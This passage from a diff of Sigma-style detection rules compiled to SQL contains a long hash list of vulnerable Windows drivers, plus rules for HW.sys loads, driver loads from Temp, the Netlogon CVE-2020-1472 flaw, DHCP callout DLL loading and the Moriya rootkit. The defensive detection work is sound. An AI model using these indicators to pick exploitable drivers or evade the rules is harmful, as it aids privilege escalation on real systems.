'358ac54be252673841a1d65bfc2fb6d549c1a4c877fa7f5e1bfa188f30375d69', 'd0bd1ae72aeb5f3eabf1531a635f990e5eaae7fdd560342f915f723766c80889', 'f85cca4badff17d1aa90752153ccec77a68ad282b69e3985fdc4743eaea85004', '6908ebf52eb19c6719a0b508d1e2128f198d10441551cbfb9f4031d382f5229f', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', 'de6bf572d39e2611773e7a01f0388f84fb25da6cba2f1f8b9b36ffba467de6fa', '950a4c0c772021cee26011a92194f0e58d61588f77f2873aa0599dff52a160c9', '36505921af5a09175395ebaea29c72b2a69a3a9204384a767a5be8a721f31b10', '6de84caa2ca18673e01b91af58220c60aecd5cccf269725ec3c7f226b2167492', 'ef86c4e5ee1dbc4f81cd864e8cd2f4a2a85ee4475b9a9ab698a4ae1cc71fbeb0', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '7cfa5e10dff8a99a5d544b011f676bc383991274c693e21e3af40cf6982adb8c', 
'f596e64f4c5d7c37a00493728d8756b243cfdc11e3372d6d6dfeffc13c9ab960', '0aafa9f47acf69d46c9542985994ff5321f00842a28df2396d4a3076776a83cb', '131d5490ceb9a5b2324d8e927fea5becfc633015661de2f4c2f2375a3a3b64c6', '3124b0411b8077605db2a9b7909d8240e0d554496600e2706e531c93c931e1b5', '1b7fb154a7b7903a3c81f12f4b094f24a3c60a6a8cffca894c67c264ab7545fa', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497', '9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c60fcff9c8e5243bbb22ec94618b9dcb02c59bb49b90c04d7d6ab3ebbd58dc3a', '4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca', 'a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '3f2fda9a7a9c57b7138687bbce49a2e156d6095dddabb3454ea09737e02c3fa5', 'f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', '5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '0fd2df82341bf5ebb8a53682e60d08978100c01acb0bed7b6ce2876ada80f670', '8111085022bda87e5f6aa4c195e743cc6dd6a3a6d41add475d267dc6b105a69f', 'be03e9541f56ac6ed1e81407dcd7cc85c0ffc538c3c2c2c8a9c747edbcf13100', '47f08f7d30d824a8f4bb8a98916401a37c0fd8502db308aba91fe3112b892dcc', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '7f375639a0df7fe51e5518cf87c3f513c55bc117db47d28da8c615642eb18bfa', 'a56c2a2425eb3a4260cc7fc5c8d7bed7a3b4cd2af256185f24471c668853aee8', 'a3e507e713f11901017fc328186ae98e23de7cea5594687480229f77d45848d8', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', 
'9529efb1837b1005e5e8f477773752078e0a46500c748bc30c9b5084d04082e6', '2bbe65cbec3bb069e92233924f7ee1f95ffa16173fceb932c34f68d862781250', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '39cfde7d401efce4f550e0a9461f5fc4d71fa07235e1336e4f0b4882bd76550e', '984a77e5424c6d099051441005f2938ae92b31b5ad8f6521c6b001932862add7', 'db2a9247177e8cdd50fe9433d066b86ffd2a84301aa6b2eb60f361cfff077004', '30706f110725199e338e9cc1c940d9a644d19a14f0eb8847712cba4cacda67ab', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', '9f4ce6ab5e8d44f355426d9a6ab79833709f39b300733b5b251a0766e895e0e5', 'd92eab70bcece4432258c9c9a914483a2267f6ab5ce2630048d3a99e8cb1b482', 'e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb', '525d9b51a80ca0cd4c5889a96f857e73f3a80da1ffbae59851e0f51bdfb0b6cd', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '4cff6e53430b81ecc4fae453e59a0353bcfe73dd5780abfc35f299c16a97998e', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', 'f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae', '575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316', '3d9e83b189fcf5c3541c62d1f54a0da0a4e5b62c3243d2989afc46644056c8e3', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 'c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c', '7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7', '61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', '1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee', 'e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e', 
'93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63', 'a9706e320179993dade519a83061477ace195daa1b788662825484813001f526', '61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8', '47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84', 'fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', '07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', '99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', 'ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c', '8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f', '36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb', '6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74', '9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449', '5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a', 'fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566', 'e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028', 'f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57', '2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4', '06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf', 'cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8', '845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', '64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57', '2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a', '85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 
'9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', 'bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955', '9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87', 'b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', '5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a', 'f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b', '405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659', '3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e', '42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980', '5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a', 'fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1', 'cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612', '4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6', '80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3', '29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94', 'db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653', '8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e', '101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558', '6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e', '5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3', 
'd7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102', '7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099', '0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3', 'f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008', 'b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e', '74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4', '7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6', 'c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8', '22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a', '76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184', 'dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097', '025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4', '50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c', 'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', 
'4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', '7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 
'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 
'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 
'4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', 
'3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b')))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "description": 
"Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya 